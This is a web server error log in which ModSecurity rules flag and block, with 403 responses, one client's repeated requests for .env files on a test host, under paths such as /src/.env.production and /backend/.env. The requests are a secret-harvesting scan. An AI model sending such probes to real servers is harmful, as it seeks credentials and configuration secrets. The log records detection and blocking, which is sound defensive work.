[Fri Jan 16 03:21:46.803178 2026] [:error] [pid 1444226] [client 45.148.10.246:51528] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWmgumcpoCUgeFICb0bgNAAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./src/.env
[Fri Jan 16 03:21:46.803404 2026] [:error] [pid 1444226] [client 45.148.10.246:51528] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWmgumcpoCUgeFICb0bgNAAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./src/.env
[Fri Jan 16 03:21:46.803562 2026] [:error] [pid 1444226] [client 45.148.10.246:51528] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWmgumcpoCUgeFICb0bgNAAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./src/.env
[Fri Jan 16 03:21:46.952317 2026] [:error] [pid 1444040] [client 45.148.10.246:51532] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.local"] [unique_id "aWmguvn_5sIyKhJ5GAza9QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.local
[Fri Jan 16 03:21:46.952561 2026] [:error] [pid 1444040] [client 45.148.10.246:51532] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.local"] [unique_id "aWmguvn_5sIyKhJ5GAza9QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.local
[Fri Jan 16 03:21:46.952709 2026] [:error] [pid 1444040] [client 45.148.10.246:51532] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.local"] [unique_id "aWmguvn_5sIyKhJ5GAza9QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.local
[Fri Jan 16 03:21:47.109687 2026] [:error] [pid 1444031] [client 45.148.10.246:51542] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.local/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.local/"] [unique_id "aWmgu3-9MmrgwjmYTAJT6QAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.local/
[Fri Jan 16 03:21:47.109914 2026] [:error] [pid 1444031] [client 45.148.10.246:51542] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.local/"] [unique_id "aWmgu3-9MmrgwjmYTAJT6QAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.local/
[Fri Jan 16 03:21:47.110068 2026] [:error] [pid 1444031] [client 45.148.10.246:51542] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.local/"] [unique_id "aWmgu3-9MmrgwjmYTAJT6QAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.local/
[Fri Jan 16 03:21:47.302322 2026] [:error] [pid 1444035] [client 45.148.10.246:51554] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.local"] [unique_id "aWmgu7auW6yeGWXfDeFYjwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//src/.env.local
[Fri Jan 16 03:21:47.302572 2026] [:error] [pid 1444035] [client 45.148.10.246:51554] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.local"] [unique_id "aWmgu7auW6yeGWXfDeFYjwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//src/.env.local
[Fri Jan 16 03:21:47.302765 2026] [:error] [pid 1444035] [client 45.148.10.246:51554] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.local"] [unique_id "aWmgu7auW6yeGWXfDeFYjwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//src/.env.local
[Fri Jan 16 03:21:47.443634 2026] [:error] [pid 1444033] [client 45.148.10.246:51570] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.local"] [unique_id "aWmgu9LJkp65ULFQ2YYjPQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./src/.env.local
[Fri Jan 16 03:21:47.443870 2026] [:error] [pid 1444033] [client 45.148.10.246:51570] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.local"] [unique_id "aWmgu9LJkp65ULFQ2YYjPQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./src/.env.local
[Fri Jan 16 03:21:47.444032 2026] [:error] [pid 1444033] [client 45.148.10.246:51570] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.local"] [unique_id "aWmgu9LJkp65ULFQ2YYjPQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./src/.env.local
[Fri Jan 16 03:21:47.577389 2026] [:error] [pid 1444034] [client 45.148.10.246:51584] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.production"] [unique_id "aWmgu-RfEYyDES-ZFL4izgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.production
[Fri Jan 16 03:21:47.577616 2026] [:error] [pid 1444034] [client 45.148.10.246:51584] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.production"] [unique_id "aWmgu-RfEYyDES-ZFL4izgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.production
[Fri Jan 16 03:21:47.577789 2026] [:error] [pid 1444034] [client 45.148.10.246:51584] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.production"] [unique_id "aWmgu-RfEYyDES-ZFL4izgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.production
[Fri Jan 16 03:21:47.752635 2026] [:error] [pid 1444226] [client 45.148.10.246:51592] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.production/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.production/"] [unique_id "aWmgu2cpoCUgeFICb0bgNQAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.production/
[Fri Jan 16 03:21:47.752864 2026] [:error] [pid 1444226] [client 45.148.10.246:51592] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.production/"] [unique_id "aWmgu2cpoCUgeFICb0bgNQAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.production/
[Fri Jan 16 03:21:47.753051 2026] [:error] [pid 1444226] [client 45.148.10.246:51592] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.production/"] [unique_id "aWmgu2cpoCUgeFICb0bgNQAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.production/
[Fri Jan 16 03:21:47.935784 2026] [:error] [pid 1444040] [client 45.148.10.246:51604] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.production"] [unique_id "aWmgu_n_5sIyKhJ5GAza9gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//src/.env.production
[Fri Jan 16 03:21:47.936024 2026] [:error] [pid 1444040] [client 45.148.10.246:51604] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.production"] [unique_id "aWmgu_n_5sIyKhJ5GAza9gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//src/.env.production
[Fri Jan 16 03:21:47.936177 2026] [:error] [pid 1444040] [client 45.148.10.246:51604] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.production"] [unique_id "aWmgu_n_5sIyKhJ5GAza9gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//src/.env.production
[Fri Jan 16 03:21:48.155175 2026] [:error] [pid 1444031] [client 45.148.10.246:51608] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.production"] [unique_id "aWmgvH-9MmrgwjmYTAJT6gAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./src/.env.production
[Fri Jan 16 03:21:48.155422 2026] [:error] [pid 1444031] [client 45.148.10.246:51608] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.production"] [unique_id "aWmgvH-9MmrgwjmYTAJT6gAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./src/.env.production
[Fri Jan 16 03:21:48.155610 2026] [:error] [pid 1444031] [client 45.148.10.246:51608] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.production"] [unique_id "aWmgvH-9MmrgwjmYTAJT6gAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./src/.env.production
[Fri Jan 16 03:21:48.302463 2026] [:error] [pid 1444035] [client 45.148.10.246:51618] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.staging"] [unique_id "aWmgvLauW6yeGWXfDeFYkAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.staging
[Fri Jan 16 03:21:48.302700 2026] [:error] [pid 1444035] [client 45.148.10.246:51618] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.staging"] [unique_id "aWmgvLauW6yeGWXfDeFYkAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.staging
[Fri Jan 16 03:21:48.302856 2026] [:error] [pid 1444035] [client 45.148.10.246:51618] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.staging"] [unique_id "aWmgvLauW6yeGWXfDeFYkAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.staging
[Fri Jan 16 03:21:48.470908 2026] [:error] [pid 1444033] [client 45.148.10.246:51624] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.staging/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.staging/"] [unique_id "aWmgvNLJkp65ULFQ2YYjPgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.staging/
[Fri Jan 16 03:21:48.471142 2026] [:error] [pid 1444033] [client 45.148.10.246:51624] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.staging/"] [unique_id "aWmgvNLJkp65ULFQ2YYjPgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.staging/
[Fri Jan 16 03:21:48.471372 2026] [:error] [pid 1444033] [client 45.148.10.246:51624] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env.staging/"] [unique_id "aWmgvNLJkp65ULFQ2YYjPgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/src/.env.staging/
[Fri Jan 16 03:21:49.007218 2026] [:error] [pid 1444226] [client 45.148.10.246:51638] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWmgvWcpoCUgeFICb0bgNgAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env
[Fri Jan 16 03:21:49.007443 2026] [:error] [pid 1444226] [client 45.148.10.246:51638] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWmgvWcpoCUgeFICb0bgNgAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env
[Fri Jan 16 03:21:49.007619 2026] [:error] [pid 1444226] [client 45.148.10.246:51638] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWmgvWcpoCUgeFICb0bgNgAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env
[Fri Jan 16 03:21:49.138451 2026] [:error] [pid 1444040] [client 45.148.10.246:51644] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env/"] [unique_id "aWmgvfn_5sIyKhJ5GAza9wAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env/
